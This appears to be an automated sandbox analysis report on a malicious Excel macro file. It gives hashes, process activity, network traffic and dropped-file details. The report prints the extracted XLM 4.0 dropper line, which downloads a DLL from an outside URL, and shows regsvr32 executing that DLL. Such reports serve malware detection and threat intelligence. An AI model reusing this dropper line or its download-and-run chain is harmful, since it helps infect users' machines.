Analysis

  • max time kernel
    118s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/11/2024, 18:53 UTC

General

  • Target

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6.xlsm

  • Size

    30KB

  • MD5

    80aef7edfc9c272322aaea7038f55657

  • SHA1

    4d9557ec54d47beb0a0d2eee419d7ee9101b4c06

  • SHA256

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

  • SHA512

    0fb2ef79c7e2f40d0eab8c13b4ca5021371b43830d8ce62b48653655bbfda74f44b16a114b251ea6cae06506a6bc3491846b9773a76e5bdc85f2597ebeed004e

  • SSDEEP

    384:n842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:gHFhNZliH2ydFfPdkqstJhE6v

Score
10/10

Malware Config

Extracted

  • Language
    xlm4.0
  • Source
    1
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://henrysfreshroast.com/6cc4ts0bkrOlXq/", "..\rfs.dll")
  • URLs (xlm40.dropper)
    http://henrysfreshroast.com/6cc4ts0bkrOlXq/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6.xlsm
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2784

Network

  • flag-us
    DNS
    henrysfreshroast.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    henrysfreshroast.com
    IN A
    Response
    henrysfreshroast.com
    IN A
    138.207.69.73
  • flag-us
    GET
    http://henrysfreshroast.com/6cc4ts0bkrOlXq/
    EXCEL.EXE
    Remote address:
    138.207.69.73:80
    Request
    GET /6cc4ts0bkrOlXq/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: henrysfreshroast.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://henrysfreshroast.com/index.php
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:28 GMT
    Content-Length: 161
  • flag-us
    GET
    https://henrysfreshroast.com/index.php
    EXCEL.EXE
    Remote address:
    138.207.69.73:443
    Request
    GET /index.php HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: henrysfreshroast.com
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://henrysfreshroast.com/
    Server: Microsoft-IIS/10.0
    X-Powered-By: PHP/7.4.33
    X-Redirect-By: WordPress
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:31 GMT
    Content-Length: 0
  • flag-us
    GET
    https://henrysfreshroast.com/
    EXCEL.EXE
    Remote address:
    138.207.69.73:443
    Request
    GET / HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: henrysfreshroast.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Encoding: gzip
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Vary: Accept-Encoding
    Server: Microsoft-IIS/10.0
    X-Powered-By: PHP/7.4.33
    Link: <https://henrysfreshroast.com/index.php/wp-json/>; rel="https://api.w.org/"
    Link: <https://henrysfreshroast.com/index.php/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    Link: <https://henrysfreshroast.com/>; rel=shortlink
    Set-Cookie: PHPSESSID=b0j1h96udd37jgc4ierdkfonlv; path=/
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:33 GMT
    Content-Length: 14327
  • flag-us
    DNS
    r10.o.lencr.org
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    r10.o.lencr.org
    IN A
    Response
    r10.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
  • flag-gb
    GET
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D
    EXCEL.EXE
    Remote address:
    88.221.135.105:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: r10.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "5FB25E8FC1881C91EE426FD437B4D9BF1DFB0AAB5F8BD4FBFCD0F8C72F609C9C"
    Last-Modified: Tue, 19 Nov 2024 16:55:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=20899
    Expires: Thu, 21 Nov 2024 00:41:48 GMT
    Date: Wed, 20 Nov 2024 18:53:29 GMT
    Connection: keep-alive
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    104.86.110.66
    a1363.dscg.akamai.net
    IN A
    104.86.110.81
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    104.86.110.66:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
    Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
    ETag: 0x8DCDDD1E3AF2C76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 50df83b2-f01e-004c-4bc4-0fc7da000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 18:54:01 GMT
    Connection: keep-alive
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: a5750a07-601e-002c-42ee-2bbb45000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 18:54:01 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV14a1efef.0
    ms-cv-esi: CASMicrosoftCV14a1efef.0
    X-RTag: RT
  • 138.207.69.73:80
    http://henrysfreshroast.com/6cc4ts0bkrOlXq/
    http
    EXCEL.EXE
    662 B
    960 B
    7
    4

    HTTP Request

    GET http://henrysfreshroast.com/6cc4ts0bkrOlXq/

    HTTP Response

    301
  • 138.207.69.73:443
    https://henrysfreshroast.com/
    tls, http
    EXCEL.EXE
    1.8kB
    19.6kB
    16
    21

    HTTP Request

    GET https://henrysfreshroast.com/index.php

    HTTP Response

    301

    HTTP Request

    GET https://henrysfreshroast.com/

    HTTP Response

    200
  • 88.221.135.105:80
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D
    http
    EXCEL.EXE
    469 B
    1.0kB
    5
    3

    HTTP Request

    GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D

    HTTP Response

    200
  • 104.86.110.66:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
    1.7kB
    4
    4

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 8.8.8.8:53
    henrysfreshroast.com
    dns
    EXCEL.EXE
    66 B
    82 B
    1
    1

    DNS Request

    henrysfreshroast.com

    DNS Response

    138.207.69.73

  • 8.8.8.8:53
    r10.o.lencr.org
    dns
    EXCEL.EXE
    61 B
    160 B
    1
    1

    DNS Request

    r10.o.lencr.org

    DNS Response

    88.221.135.105
    88.221.134.137

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
    162 B
    1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    104.86.110.66
    104.86.110.81

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\rfs.dll

    Filesize

    56KB

    MD5

    d5cbf3235a39c09c9d292dafdf0393a5

    SHA1

    ae109e202e6f0965b47f38ee29b3725800939a9f

    SHA256

    208d15c175407bc56c9e1d1a6e31290cf8c04fe1da742e4ad0dbe06960b7f1dd

    SHA512

    202212aeb1cabe772e05ec7649b83be4a04b68b644a1621993e91e370dc0b9de268ea50f0dab3a74178ecb648d06b5173222d3ed1f0e31d04abeded020b079bd

  • memory/1848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1848-1-0x0000000072A4D000-0x0000000072A58000-memory.dmp

    Filesize

    44KB

  • memory/1848-5-0x0000000072A4D000-0x0000000072A58000-memory.dmp

    Filesize

    44KB
